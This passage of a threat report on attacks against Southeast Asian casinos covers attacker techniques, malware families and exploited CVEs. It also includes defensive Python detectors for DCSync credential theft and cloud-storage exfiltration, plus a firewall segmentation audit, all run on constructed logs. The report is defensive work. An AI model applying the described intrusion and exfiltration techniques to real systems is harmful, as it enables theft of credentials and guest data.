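    """Flag 4662 events exercising replication rights from a principal not on the allow-list."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue  # some other directory object access, not replication
        subject = ev.get("SubjectUserName", "").lower()
        if subject in ALLOWED_REPLICATORS:
            continue
        alerts.append(DcsyncAlert(
            subject_user=subject,
            logon_host=ev.get("SourceHost", "unknown"),
            target_dc=ev.get("Computer", "unknown"),
            rights=rights,
        ))
    return alerts


# Constructed sample: one legitimate DC-to-DC replication, one DCSync from a finance
# workstation using a compromised admin account, one unrelated 4662, one 4624 logon.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "DC02$", "SourceHost": "DC02",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "j.tan", "SourceHost": "WS-FIN-17",
     "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "j.tan", "SourceHost": "WS-FIN-17",
     "AccessMask": "0x20",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},   # user object class, not replication
    {"EventID": 4624, "Computer": "DC01", "SubjectUserName": "j.tan", "SourceHost": "WS-FIN-17"},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspected: {a.subject_user} from {a.logon_host} against {a.target_dc}, rights={a.rights}")
```

The allow-list is the part that needs care: a request from a non-DC account is the classic DCSync signature, but the same right is legitimately used by directory synchronisation services, so those service accounts must be enumerated and any new principal exercising the right should be treated as a change-control event rather than silently added.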
Ransomware operators similarly try to access Active Directory to deploy ransomware widely via domain group policies or enterprise software deployment tools. The interconnectivity of resort systems (hotel check-in, player databases, surveillance, building control) means that once attackers get a foothold, they can pivot to multiple sensitive systems.
In one Southeast Asian casino case, multiple operational systems beyond slot management were affected, underscoring how quickly attackers can spread laterally through a resort's network.
Persistence and Evasion
Attackers aim to maintain access even in environments with active defenders.
Persistence techniques include creating local admin accounts, deploying web shells, and scheduling tasks. In one Southeast Asian case, threat actors installed open-source VPN software on a victim server and connected out to attacker-controlled GitHub hosts. Chinese groups have used stolen code-signing certificates (e.g., Ivacy VPN certificate) to help malware evade detection.
Ransomware affiliates such as Scattered Spider have shown real-time response capability. When defenders at MGM began isolating systems, the attackers accelerated ransomware deployment. Unit 42 found they even tried to steal incident response playbooks to anticipate response actions.
In at least one Southeast Asian casino breach, defenders shut down systems quickly — a move that helped contain the intrusion but disrupted operations.
Data Exfiltration and Theft
Nearly all recent casino incidents involve data theft, not just encryption. BlackCat reportedly stole 6 terabytes from MGM and Caesars, while a Southeast Asian casino breach also saw internal files taken, and Cl0p exfiltrated employee data from Aristocrat.
APT groups also go after sensitive databases, like VIP guest lists, financial records, or surveillance footage — often quietly and over long periods. Attackers use encrypted channels or cloud services like OneDrive or Dropbox, knowing these are less likely to be blocked.
Some intruders package data into password-protected archives and upload them to attacker-controlled cloud buckets during off-hours to avoid detection. The amount and sensitivity of casino-held data — including passports, financial info, and betting histories — makes these targets exceptionally lucrative. Even state actors may seek such data for espionage or to enable phishing campaigns against high-profile gamblers.
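The staging pattern described above (password-protected archives pushed to consumer cloud storage during off-hours) is detectable at the egress point even when the content is encrypted, because the volume and timing are anomalous for the source host. The following is an added example written for this report, not code from any product or vendor cited. It aggregates outbound bytes per internal host and destination over a sliding one-hour window from constructed web-proxy records and raises an alert above a size threshold, escalating when the burst falls in the small hours. The cloud-storage domain list, the sanctioned corporate tenant, the thresholds and the hostnames are all hypothetical.

```python
"""Spot bulk off-hours uploads to personal cloud storage in proxy logs.

Added example, not part of the original report. Proxy records are constructed
inline with local (UTC+8) timestamps; CLOUD_STORAGE_SUFFIXES, the sanctioned
tenant, thresholds and hostnames are hypothetical.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, time, timedelta
from typing import Iterable, List

MB = 1024 * 1024
BYTES_THRESHOLD = 500 * MB          # bytes out per host/destination inside WINDOW
WINDOW = timedelta(hours=1)
OFF_HOURS = (time(0, 0), time(6, 0))   # local clock hours with least legitimate back-office activity

# Personal / consumer file-sharing services attackers favour because they are rarely blocked.
CLOUD_STORAGE_SUFFIXES = ("dropbox.com", "dropboxapi.com", "mega.nz", "mega.io",
                          "onedrive.live.com", "1drv.ms", "drive.google.com",
                          "mediafire.com", "wetransfer.com")
# Hypothetical corporate OneDrive tenant: sanctioned, so excluded from the rule.
SANCTIONED_SUFFIXES = ("example-resort-my.sharepoint.com",)


@dataclass(frozen=True)
class ExfilAlert:
    src: str
    dst: str
    bytes_out: int
    window_start: datetime
    off_hours: bool
    severity: str


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def _matches(host: str, suffixes) -> bool:
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in suffixes)


def is_off_hours(ts: datetime) -> bool:
    return OFF_HOURS[0] <= ts.time() < OFF_HOURS[1]


def detect_bulk_uploads(records: Iterable[dict]) -> List[ExfilAlert]:
    """Largest one-hour upload volume per (src, dst) pair to unsanctioned cloud storage."""
    by_pair = defaultdict(list)
    for r in records:
        if r["method"] not in ("POST", "PUT"):
            continue  # downloads are not exfiltration
        if _matches(r["dst"], SANCTIONED_SUFFIXES) or not _matches(r["dst"], CLOUD_STORAGE_SUFFIXES):
            continue
        by_pair[(r["src"], r["dst"])].append((_ts(r["ts"]), r["bytes_out"]))

    alerts = []
    for (src, dst), items in by_pair.items():
        items.sort()
        window, total = deque(), 0
        best = (0, None, False)   # (bytes, window start, any off-hours record in window)
        for ts, nbytes in items:
            window.append((ts, nbytes))
            total += nbytes
            while ts - window[0][0] > WINDOW:
                total -= window.popleft()[1]
            if total > best[0]:
                best = (total, window[0][0], any(is_off_hours(t) for t, _ in window))
        if best[0] >= BYTES_THRESHOLD:
            severity = "high" if best[2] else "medium"
            alerts.append(ExfilAlert(src, dst, best[0], best[1], best[2], severity))
    return alerts


SAMPLE_RECORDS = [  # constructed proxy log, local time UTC+8
    # File server pushing ~830 MB to Dropbox in three chunks between 02:10 and 02:50
    {"ts": "2025-03-03T02:10:00+08:00", "src": "FILE-SRV-02", "dst": "content.dropboxapi.com", "method": "POST", "bytes_out": 300 * MB},
    {"ts": "2025-03-03T02:25:00+08:00", "src": "FILE-SRV-02", "dst": "content.dropboxapi.com", "method": "POST", "bytes_out": 280 * MB},
    {"ts": "2025-03-03T02:50:00+08:00", "src": "FILE-SRV-02", "dst": "content.dropboxapi.com", "method": "POST", "bytes_out": 250 * MB},
    # Marketing workstation: small daytime uploads, under threshold
    {"ts": "2025-03-03T10:00:00+08:00", "src": "WS-MKT-11", "dst": "drive.google.com", "method": "POST", "bytes_out": 50 * MB},
    {"ts": "2025-03-03T11:30:00+08:00", "src": "WS-MKT-11", "dst": "drive.google.com", "method": "POST", "bytes_out": 40 * MB},
    # HR workstation syncing to the sanctioned corporate tenant: ignored
    {"ts": "2025-03-03T14:00:00+08:00", "src": "WS-HR-04", "dst": "example-resort-my.sharepoint.com", "method": "PUT", "bytes_out": 900 * MB},
    # Finance workstation downloading from Dropbox: GET, ignored
    {"ts": "2025-03-03T15:00:00+08:00", "src": "WS-FIN-02", "dst": "content.dropboxapi.com", "method": "GET", "bytes_out": 1 * MB},
    # Slot management server uploading 600 MB to MEGA during business hours
    {"ts": "2025-03-03T13:05:00+08:00", "src": "SLOT-MGMT-01", "dst": "mega.nz", "method": "PUT", "bytes_out": 600 * MB},
]

if __name__ == "__main__":
    for a in detect_bulk_uploads(SAMPLE_RECORDS):
        print(f"[{a.severity}] {a.src} -> {a.dst}: {a.bytes_out // MB} MB from {a.window_start} (off-hours={a.off_hours})")
```

The rule deliberately keys on the source host class as much as on the destination: a slot-management or file server has no business uploading anything to a consumer storage service at any hour, so for server segments the threshold can be set near zero and the domain list widened, while workstations need the volume test to keep the alert rate manageable.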
Denial-of-Service as Distraction/Extortion
While breaches are the primary goal, some attackers also launch DDoS attacks as a smoke screen or added pressure during ransom negotiations. These “Ransom DDoS” (RDDoS) campaigns have hit Asian online casinos, flooding betting portals with junk traffic until a payment is made.
Most DDoS attacks in this sector are relatively low-volume but disruptive. ENISA reported that by late 2023, the gaming and gambling sector had become the single most targeted industry for DDoS globally, accounting for 42% of all observed attacks.
In some cases, DDoS may serve as a diversion — distracting IT teams while a quieter intrusion unfolds elsewhere. For casinos with online services such as booking portals, loyalty apps, or betting platforms, the risk of blended attacks (DDoS plus ransomware/extortion) remains high.
Summary of TTPs
Recent incidents in casinos and integrated resorts show adversaries blending social engineering, software exploits, and stealthy movement to achieve impact quickly. Many campaigns unfold rapidly (MGM's attackers obtained domain admin within 24 hours and launched ransomware soon after), while state-linked espionage groups stay hidden for months. Even the slower intrusions show a deep understanding of resort environments: adversaries blend in using legitimate tools, exfiltrate sensitive data quietly, and adapt quickly when detected. For casinos, understanding these TTPs matters not only for defence but for anticipating the adversary's next move.
Below is a breakdown of observed TTPs from recent casino incidents, aligned to the stages of the MITRE ATT&CK framework:
- Initial Access: Phishing/vishing (MGM); web app exploit & web shell (various SEA APT intrusions); supply-chain compromise (Aristocrat via MOVEit exploit).
- Execution: User executes trojanized software (ChattyGoblin LiveHelp agent); scheduled tasks to run malware; WMI scripts (APT41).
- Persistence: Create new local admin accounts; install web shells on servers (APT in SEA); maintain VPN backdoor tunnels (APT case with custom VPN server).
- Privilege Escalation: Steal AD credentials via DCSync (APT41); keyloggers capturing admin passwords (DiceyF); exploit Windows privilege escalation flaws.
- Lateral Movement: Use RDP with stolen creds; deploy RMM tools like ScreenConnect (eCrime); pivot through shared file servers; target backup servers and domain controllers early (common ransomware practice).
- Evasion: Abuse signed binaries and LOLBins (living-off-the-land tools); disable antivirus/EDR; deploy attacker-controlled VMs (“Munchkin”) to bypass host defenses.
- Exfiltration: Compress and exfiltrate over HTTPS or to attacker-controlled cloud storage; leverage legitimate file-sharing (e.g., OneDrive API) to blend in.
- Impact: Deploy ransomware to encrypt systems (BlackCat, LockBit); in espionage cases, maintain covert access for extended periods (APT41 observed ~9 months in some environments).
Key takeaway: Adversaries aren’t relying on one trick — they chain social engineering, vulnerabilities, and legitimate tools to blend in and strike fast. Casinos must therefore defend against both “loud” ransomware crews and stealthy APTs with equal vigilance.
Key Malware, Tools, and Exploits

Several malware families and hacking tools have featured prominently in recent attacks on casinos and integrated resorts:
BlackCat (ALPHV) Ransomware
A modern ransomware family written in Rust and operated by the ALPHV RaaS group. It was the payload that crippled MGM's IT systems and was likely the same encryptor used in a Southeast Asian casino attack.
BlackCat is known for its adaptability – it targets Windows, Linux, and ESXi hypervisors, includes modules for data theft, and supports deployment of the “Munchkin” VM to bypass security tools. BlackCat is operated by affiliates who often first infiltrate via other means (like Scattered Spider’s social engineering).
Notable capability: BlackCat’s encryptor is highly configurable (can encrypt certain files, skip others for stability), and it tries to delete backups and shadow copies to ensure ransom leverage.
Cl0p Ransomware and Data-Theft Tools
Associated with FIN11/TA505, Cl0p focuses on data theft and extortion. Rather than custom malware for initial access, Cl0p’s hallmark is exploiting zero-day vulnerabilities in widely used file transfer software (MOVEit Transfer, Accellion FTA, Fortra GoAnywhere).
In 2023, Cl0p’s mass exploitation of MOVEit Transfer (CVE-2023-34362) compromised over 600 organizations, including Aristocrat Leisure. Its method typically involves a custom web shell/dropper that exfiltrates databases via SQL queries. Cl0p then extorts victims by threatening to publish the stolen data on its leak site if no payment is made.
For casinos, this highlights the risk of third-party software; both Aristocrat and Crown Resorts were impacted by file-sharing platform vulnerabilities.
Custom Casino-Focused RATs/Backdoors
Chinese APTs have deployed bespoke malware in casino espionage campaigns. DiceyF’s GamePlayerFramework is a modular RAT tailored for casino espionage, with modules nicknamed “Tifa” and “Yuna” (after game characters), capable of keystroke logging, clipboard theft, and payload deployment.
Operation ChattyGoblin featured a trojanized binary signed with a stolen certificate, masquerading as LiveHelp software, to backdoor Philippine casino systems.
Tools like HUI Loader (used by Bronze Starlight/APT41) decrypt payloads in memory and are frequently seen in Southeast Asian espionage. These indicate a high level of investment in stealth and persistence.
Point-of-Sale (POS) Malware
Although ransomware dominates headlines, card data theft via POS malware remains an ongoing but quieter threat. Malware families like MonitorMiner, DMSniff, and TreasureHunt have been used to infect POS terminals in hospitality venues.
CrowdStrike reported that CHEF Spider targeted POS systems in the sector, suggesting tools like “Pizza Thief” POS malware or Carbanak/Anunak (used by FIN7) could be repurposed for casinos.
Attackers who compromise a casino’s corporate network may drop RAM-scraping malware on POS servers or Windows-based cash registers to harvest credit card data. While no major Southeast Asian card breach has been publicized recently, it remains a known risk.
Cobalt Strike and Post-Exploitation Kits
Frameworks like Cobalt Strike Beacon, Sliver, and Meterpreter are widely used to establish command-and-control (C2) after initial access. In incidents like MGM, after obtaining credentials, attackers deployed Cobalt Strike beacons to maintain persistence and orchestrate lateral movement.
Casinos have detected Cobalt Strike on their networks in several incidents, often masquerading as benign processes. Brute Ratel, a stealthier successor, and open-source frameworks like Empire could also be used by APTs. The presence of these tools is a strong indicator of hands-on-keyboard activity by skilled operators.
Exploits & Vulnerabilities of Note
Key exploited vulnerabilities impacting this sector included:
- MOVEit Transfer (CVE-2023-34362) – exploited by Cl0p in the Aristocrat breach.
- Fortra GoAnywhere MFT (CVE-2023-0669) – exploited by Cl0p in early 2023; Crown Resorts was among the organisations exposed through this file-transfer platform. Cl0p had run the same playbook against Accellion FTA zero-days in early 2021.
- Zoho ManageEngine ADSelfService Plus (CVE-2021-40539) – leveraged by Chinese APTs.
- VPN appliances (Pulse Secure, Fortinet, etc.) – frequent APT ingress vector.
- Windows PrintNightmare (CVE-2021-34527) – privilege escalation bug.
- Confluence, Citrix, and Exchange flaws – critical vulns that casinos have been slow to patch, leaving entry points for both APT and ransomware groups.
In short, ransomware families (BlackCat, Cl0p, and LockBit), specialized RATs (like GamePlayerFramework), and a suite of exploits/post-exploitation kits form the arsenal used against casinos. State actors tend to favor stealthy implants and RATs for espionage, while cybercriminals deploy blunt-force tools for maximum extortion—making defense a high-stakes challenge for this industry.
Vulnerabilities in Casino Operational Systems

Casinos and integrated resorts present an unusually broad attack surface. Their operations span corporate IT, specialised gaming systems, hospitality platforms, and smart building infrastructure — each a potential entry point for attackers. Key areas of exposure include:
Hospitality & Hotel IT Systems
Integrated resorts run hotel management platforms that control everything from electronic door locks to reservation databases and spa systems. These systems may be outdated or not segmented from the casino network. For example, the MGM attack caused digital room key locks to fail and guests to be locked out, implying the door key system was networked and got disrupted by malware or a precautionary shutdown. Hotel guest Wi-Fi networks, if not properly isolated, can also be a weak point – the classic “DarkHotel” APT operations targeted travelers via hotel Wi-Fi malware. A casino’s VIP guests and executives connect to these networks, making them potential targets for man-in-the-middle attacks or credential theft. Email systems for hotel reservations could be phishing entry points (e.g., a fake booking request carrying malware to a reservations clerk).
Point-of-Sale (POS) and Payment Systems
Restaurants, bars, and retail outlets within a casino often run 24/7 on Windows-based POS terminals that may not be frequently patched. These systems are frequent targets for memory-scraping malware to steal card data. Attackers who infiltrate the corporate network can quietly deploy skimmers on any vulnerable endpoint. ATMs inside resorts have also been targeted—most notably in 2019, when an Eastern European gang hacked resort ATMs in Macau. Some incidents involved jackpotting malware, where attackers made ATMs “spit out” cash without triggering financial reconciliation. Cash cage systems and e-wallet platforms, which manage chips or cashless gaming credits, are also potential high-value targets.
Casino Management Systems (CMS):
CMS platforms are the digital brains of the gaming floor – managing slot machine status, jackpots, player tracking, and loyalty programs. A vulnerability in the CMS can cause wide disruption — in one Southeast Asian incident, the majority of slot machines went offline, likely due to the central system being severed or deliberately shut down to contain malware spread.
While modern gaming machines have safeguards against direct tampering, administrator access to the CMS creates powerful opportunities for attackers. They could:
- Distribute ransomware or malware to all connected endpoints simultaneously.
- Harvest sensitive data, including high-roller betting histories, loyalty records, and operational revenue data.
- Manipulate or corrupt loyalty program balances for financial gain.
Though CMS and surveillance networks are typically segmented on separate VLANs, weak isolation, insider knowledge, or poor architecture often allows attackers to pivot from corporate IT into casino OT. This makes the CMS not only a crown jewel for extortion attempts but also a conduit for broader operational disruption.
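The pivot from corporate IT into the CMS or surveillance VLAN described above is a rulebase problem before it is a malware problem. The following Python script is an added example, not part of this report or any vendor's tooling: it audits a constructed firewall rulebase for permits that let lower-trust zones reach the CMS, surveillance or backup zones. The zone subnets, rule names and the management jump-host address are assumptions chosen for illustration.

```python
"""Segmentation audit over a constructed firewall rulebase.

Added example for this report (not the report's or any vendor's code).
Zones model the casino environment described above; the subnets, rule
names and the jump-host address are assumptions for illustration only.
"""
import ipaddress
from dataclasses import dataclass

ZONES = {
    "corporate":    ipaddress.ip_network("10.10.0.0/16"),
    "hotel_pms":    ipaddress.ip_network("10.20.0.0/16"),
    "guest_wifi":   ipaddress.ip_network("172.16.0.0/12"),
    "cms_gaming":   ipaddress.ip_network("10.50.0.0/16"),
    "surveillance": ipaddress.ip_network("10.60.0.0/16"),
    "backup":       ipaddress.ip_network("10.70.0.0/16"),
}
# Zones that must only be reachable from inside themselves or from the
# management jump host (assumed address).
PROTECTED = {"cms_gaming", "surveillance", "backup"}
JUMP_HOST = ipaddress.ip_network("10.10.250.5/32")

@dataclass(frozen=True)
class Rule:
    name: str
    src: str      # CIDR or "any"
    dst: str      # CIDR or "any"
    port: str     # e.g. "tcp/3389" or "any"
    action: str   # "allow" or "deny"

def to_net(spec):
    return ipaddress.ip_network("0.0.0.0/0" if spec == "any" else spec, strict=False)

def zones_of(net):
    """Every zone whose address space the network overlaps."""
    return {name for name, zone in ZONES.items() if net.overlaps(zone)}

def audit(rules):
    """Return (rule name, reason) for each allow rule that crosses into a protected zone.

    Rule order is deliberately ignored: the question is whether any permit
    exists at all, which is what an attacker who already controls a host in
    the source zone will discover.
    """
    findings = []
    for rule in rules:
        if rule.action != "allow":
            continue
        src, dst = to_net(rule.src), to_net(rule.dst)
        hit = zones_of(dst) & PROTECTED
        if not hit:
            continue                      # destination never touches a protected zone
        if src.subnet_of(JUMP_HOST):
            continue                      # sanctioned admin path
        # Acceptable only when the source lies entirely inside the single
        # protected zone it is talking to (intra-zone traffic).
        intra_zone = len(hit) == 1 and src.subnet_of(ZONES[next(iter(hit))])
        if not intra_zone:
            findings.append((rule.name, f"{rule.src} -> {rule.dst} {rule.port} reaches {', '.join(sorted(hit))}"))
    return findings

# Constructed rulebase; several rules are the kind of mistake a flat network accumulates.
SAMPLE_RULES = [
    Rule("corp-egress-any",     "10.10.0.0/16",   "any",           "tcp/443",  "allow"),
    Rule("jump-to-cms-rdp",     "10.10.250.5/32", "10.50.0.0/16",  "tcp/3389", "allow"),
    Rule("corp-to-cms-smb",     "10.10.0.0/16",   "10.50.10.0/24", "tcp/445",  "allow"),
    Rule("pms-to-surveillance", "10.20.0.0/16",   "10.60.0.0/16",  "any",      "allow"),
    Rule("cms-internal",        "10.50.0.0/16",   "10.50.0.0/16",  "any",      "allow"),
    Rule("guest-to-protected",  "172.16.0.0/12",  "10.50.0.0/16",  "any",      "deny"),
    Rule("default-deny",        "any",            "any",           "any",      "deny"),
]

if __name__ == "__main__":
    for name, reason in audit(SAMPLE_RULES):
        print(f"VIOLATION {name}: {reason}")
```

Run it directly to print the findings. The broad "corporate to any" egress rule is reported as well: a destination of any on an internal firewall silently covers the gaming VLANs, which is exactly the flat-network weakness the text describes. Flows between two protected zones (for example backup agents reaching CMS hosts) are also flagged, so sanctioned ones must be modelled as explicit exceptions, as the jump host is here.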
IoT and Smart Building Systems:
Modern integrated resorts are effectively smart cities in miniature – with IoT powering HVAC systems, lighting, elevators, CCTV, and even guest amenities. While these technologies improve efficiency and experience, they also introduce a wide and often under-secured attack surface.
The infamous 2017 “fish tank thermometer hack” remains a cautionary tale: attackers breached a North American casino’s network through a connected aquarium sensor and pivoted to steal data. Similar risks persist today as many building management systems still run on embedded or legacy operating systems with default credentials.
If compromised, adversaries could:
- Disrupt HVAC or power systems to cause chaos on the gaming floor.
- Hijack CCTV feeds to spy on VIP guests or security staff.
- Manipulate badge access or smart elevators to facilitate physical intrusion.
- Exploit poorly secured IoT controllers as footholds into more sensitive IT or OT systems.
Research in 2022 also revealed vulnerabilities in popular hotel digital safes, raising concerns that attackers could target high-roller suites or guest valuables. For casinos, this convergence of IT, OT, and IoT means that what seems like a low-risk device (e.g., an aquarium sensor, smart thermostat, or digital signage system) could serve as a beachhead for broader compromise.
The sheer diversity of IoT deployed in resorts – often managed by different vendors and rarely patched with urgency – makes this category one of the most unpredictable and dangerous vectors in the casino threat landscape.
Legacy Software and OS
Many casino-specific systems – from electronic gaming machines and ticketing kiosks to digital signage – still run on outdated operating systems such as Windows 7, XP Embedded, or proprietary RTOS. These platforms are difficult and expensive to upgrade, often requiring hardware replacement or regulatory recertification, so they remain online long after vendor support has ended.
Attackers exploit these weak points. For example, slot machine client software running on Windows 7 could be compromised via an unpatched SMB vulnerability, allowing malware to spread machine-to-machine across the gaming floor. Outdated back-office software is also common, creating exploitable gaps across HR, finance, and operations.
Experts note that casinos sometimes prioritize physical security – guards, surveillance, and anti-cheating controls – over timely IT modernization. As one analyst put it: “After seeing all the physical security… one would think the computer controls are just as strong. However, outdated systems, weak policies, and lack of C-suite buy-in create gaps cyber criminals can exploit.”
This risk is especially acute in smaller or state-run casinos in Southeast Asia, where limited budgets or bureaucracy delay upgrades. In such environments, a single legacy weakness can become an entry point for ransomware, data theft, or lateral movement across critical systems.
Third-Party Connections
Casinos have numerous third-party integrations – from payment processors and hotel franchisors to slot machine vendors, IT contractors, and marketing agencies. A breach in any connected third party can open the door to the casino’s core systems. For example, a vendor’s remote support link (such as slot machine remote diagnostics) could be hijacked if not properly secured.
In 2024, Singapore’s Cyber Security Agency highlighted a supply-chain attack where a single IT provider breach impacted multiple hotels at once. A similar event in the casino sector could spread quickly across properties serviced by the same MSP or vendor.
Additionally, many integrated resorts are tied to multinational parent companies (e.g., Las Vegas Sands owns MBS), so an intrusion in one region could cascade across corporate networks. Cloud services used by resorts for HR, finance, or loyalty programs present another exposure point. Misconfigured cloud storage has already caused data leaks in other industries; for casinos, a similar misstep could expose VIP guest data or employee records.
In essence, the IT environment of casinos is unusually complex — a mix of legacy and cutting-edge, IT and OT, public-facing and internal systems — creating a broad attack surface. The biggest risks often stem not from individual software bugs but from architectural weaknesses: flat networks, weak segmentation between casino operations and hotel administration, unmonitored data flows, and misplaced reliance on obscurity (“who would target a slot machine network?”).
The infamous fish-tank hack may be years old, but it remains a cautionary reminder: any connected device can be a foothold if not secured. Casinos also face the unique challenge of being 24/7 businesses — patching and downtime are avoided, leaving exploitable windows open. Adversaries take advantage of this “always on” requirement, often striking during peak hours or exploiting systems that cannot easily be taken offline for updates.
The result is persistently high exposure. As one survey cited in an IAG report found, 73% of Australian businesses hit by ransomware paid within 48 hours, underscoring that resilience and prevention are still playing catch-up in high-pressure sectors like gaming.
Geographic and Geopolitical Patterns

The cyber threat landscape facing Southeast Asian casinos reveals distinct geographic and geopolitical dynamics:
China’s Shadow
Chinese state-affiliated hacking groups loom large in the region. After Beijing clamped down on Macau, high-roller activity and gaming operations spilled over into Southeast Asia – notably the Philippines, Cambodia, Laos, and to some extent Singapore. In response, Chinese cyber-espionage operations ramped up against those countries’ gambling sectors.
Campaigns such as ChattyGoblin (targeting a Philippine casino) and broader surveillance efforts align with China’s intention to monitor capital outflows, transnational crime, and persons of interest (including corrupt officials or criminal syndicates) involved in offshore gambling. SentinelOne observed that following Macau’s decline, it was “not surprising to see Chinese APT groups target the sector” afterwards. Researchers have noted tool-sharing between Chinese groups, and some operations have used stolen digital certificates, such as one belonging to the Singapore-based parent firm of Ivacy VPN, to sign their malware.
This shift is not only about surveillance but also about protecting economic influence: with billions once flowing through Macau now moving offshore, Beijing views these casinos as both a financial risk and a political lever. By targeting the digital infrastructure of casinos in Southeast Asia, Chinese actors can monitor capital outflows and gain leverage over governments hosting this activity.
Geopolitically, this aligns with Beijing’s aims of cracking down on what it views as illegal gambling affecting its citizens and of gaining leverage (information) over Southeast Asian counterparts. Chinese APTs have also shown coordination: in Operation Crimson Palace, three different Chinese groups simultaneously targeted a Southeast Asian government, likely under one central tasking. Similarly, against casinos, one group might perform an initial compromise (watering hole or supply chain) and pass access to another focused on data extraction.
North Korea’s Financial Reach
North Korea’s cyber operations are global in scale, but Southeast Asia stands out in two key ways: as a target and as a laundering hub. The Lazarus Group has been linked to attacks on online casinos, including the Australian-founded crypto casino Stake, as well as fintech and crypto firms in Singapore and Malaysia.
A Reuters investigation revealed that “North Korean hackers are sharing money-laundering networks with fraudsters and drug traffickers in Southeast Asia” highlighting the region’s role in cashing out illicit gains. Stolen casino funds and gambling proceeds have reportedly been laundered through shell companies in Southeast Asia or via Chinese-run casinos in the Golden Triangle.
What makes casinos particularly useful in this ecosystem is their integration into regional underground financial channels. Junket operators, informal remittance systems, and opaque VIP programs create an environment where illicit funds can be mixed with legitimate high-roller activity. North Korean groups exploit this both directly — by targeting casinos with intrusions — and indirectly, by laundering proceeds through associated networks.
While not a direct cyber-attack pattern, this infrastructure support implies that North Korean hackers have interest in penetrating financial nodes in SEA. If a land-based casino’s VIP program has links to cryptocurrency wallets or if its junket operators deal in crypto, those could become NK targets. Similarly, South Korean or Japanese-owned casinos in SEA (for example, Japanese investments in Philippines IRs) may attract North Korean espionage aimed at tracking those nations’ strategic or commercial interests.
Regional Cybercrime Syndicates
Southeast Asia unfortunately hosts some of the largest cyber-fraud rings (like those running online scams from Cambodia, Myanmar casinos, or Philippine POGOs – Philippine Offshore Gaming Operators). These criminal groups could potentially turn their attention inward to local casinos.
For instance, the UNODC report on cybercrime in SE Asia noted the rise of service-based models and collaboration among Asian crime groups, sometimes using casino businesses as fronts. There’s evidence that some rogue IT personnel from online gambling outfits have insider knowledge that could aid in hacking rival casinos or their own employers. While major ransomware and APT attacks have been linked to external actors, one cannot rule out that insiders or local gangs might exploit a casino’s vulnerabilities if it serves their interests (such as rigging jackpots, or stealing VIP data to kidnap a high-roller – a very real physical threat in some countries).
Global Ransomware Franchise Hits Asia
Many ransomware groups, such as BlackCat, Cl0p, and LockBit, originate from Eastern Europe and Russia or operate through affiliates worldwide. Their campaigns have no borders; they pursue large, vulnerable targets wherever they find them. Language and time-zone preferences can still shape targeting: the ALPHV/Scattered Spider attacks showed a preference for English-speaking environments (they socially engineered an English-speaking helpdesk), but ALPHV’s success at a major Philippine resort shows they are willing to target organisations that do not operate primarily in English too, possibly via affiliates familiar with the local language.
There is also a trend of copycat activity: when one group finds success in a specific industry, others follow. After MGM and Caesars’ incidents in the U.S., other ransomware crews may have proactively scanned or phished casinos in Asia, anticipating that defences might be comparatively weaker. In 2024, LockBit reportedly claimed attacks on hotels in India and Thailand, indicating a growing APAC footprint.
Some ransomware groups have also used symbolic attacks to make a statement. In 2022, pro-Russian hacktivists launched a DDoS attack against Japan’s casino commission website– not for monetary gain, but to protest Japan’s stance on Russia. This shows how geopolitical tensions can occasionally spill over into the casino sector, making it a target even when the motivation isn’t financial.
ASEAN Cooperation and Response Differences
Southeast Asia is not a monolithic region when it comes to cybersecurity maturity. Singapore leads with advanced defenses and strict breach disclosure laws. Malaysia and Thailand are steadily improving their cybersecurity posture, while countries like Cambodia and Laos have more nascent capabilities.
Threat actors often calibrate attacks based on this uneven playing field. For example, a Chinese APT may be more aggressive in a country with weaker cyber laws or minimal enforcement; there have been persistent rumours of multiple unreported breaches in Cambodian casinos, especially in Sihanoukville. In contrast, the same actor might behave more cautiously in Singapore, where collaboration between law enforcement and international partners is stronger and where regulatory scrutiny is high.
Cultural context also plays a role. Some Asian companies prefer to “save face” by quietly resolving incidents rather than disclosing them publicly, which limits visibility into the true scale of cyberattacks in the region. This reluctance to report is something ransomware actors exploit, pressuring victims to pay quietly rather than seek help.
As noted in an IAG article, the ongoing wave of attacks “seems to suggest a concerted effort by one or more groups to target gaming companies around the world”. Mapping out regional incidents reveals potential clusters around late 2023, and possibly again in late 2024, hinting at cyclical targeting, perhaps timed around major events or financial reporting cycles when disruption would be most damaging.
Beyond China and North Korea: A Wider Geopolitical Lens
Casinos occupy a unique intersection of finance, tourism, and, at times, organised crime, making them attractive targets for a range of nation-state actors. While Chinese and North Korean cyber activity dominates the current landscape in Southeast Asia, other state-backed threat groups have also shown interest in adjacent industries. For example, Iranian and Russian APTs have targeted hospitality providers in the past to conduct surveillance on diplomats and political figures.
It is not far-fetched to imagine scenarios in which casinos become high-value espionage targets, such as during an international summit hosted at Singapore’s Marina Bay Sands or Indonesia’s Bali Nusa Dua complex. In that context, APTs might exploit hotel networks, Wi-Fi infrastructure, or guest reservation systems to extract intelligence. This underscores how quickly a typically financially motivated target can become politically strategic.
In summary, Chinese state hackers dominate the state-sponsored threat picture in Southeast Asian gambling (with dual motives of intelligence and economic gain), while Eastern European/Russian-speaking cybercriminal gangs dominate the financial crime picture (ransomware, data theft). North Korea remains a wild card primarily focused on financial hacking.
The region’s vulnerabilities—both technical and procedural—have attracted these global actors who perceive casinos as lucrative, data-rich, and cash-rich environments. As long as casinos continue to generate billions in revenue and hold valuable personal data, and as long as some operate in jurisdictions with less mature cyber oversight, these geographic patterns of targeting are likely to persist or even intensify.
Conclusion: Casinos in the Crosshairs

